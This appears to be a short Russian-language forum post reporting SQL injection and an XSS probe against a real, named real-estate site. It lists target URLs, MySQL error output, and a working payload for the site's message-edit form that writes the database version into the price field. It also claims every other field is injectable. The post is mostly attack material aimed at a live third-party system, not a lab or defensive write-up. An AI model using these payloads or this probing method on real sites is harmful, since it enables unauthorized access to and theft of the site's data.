уязвимо : ваше имя
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';">alert('XSS')','177','a4c0338947c01a38489d4e0e7 d45ad06','2010-04-19 03' at line 1
незнаю уязвимость или нет но по крайней мере ругается:
http://norieltor.ru/search/offer=1&p=3&o=2&r=4,3&c1=0&c2=0&s=1&v=1&page=1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' and `komnati` IN (4,3) and UNIX_TIMESTAMP(datetime_post) > 1266424935 ORDER' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '',3) and UNIX_TIMESTAMP(datetime_post) > 1266424951 ORDER BY `datetime_post` DES' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and UNIX_TIMESTAMP(datetime_post) > 1266424972 ORDER BY `datetime_post` DESC' at line 1
Инъекция!!!
http://norieltor.ru/edit/ -редактируем своё сообщение
в цену вставляем: 200', `cena`=(SELECT VERSION()),`plita`='1. В цене получим покоцаную версию.
Инъекция есть во всех остальных полях!!!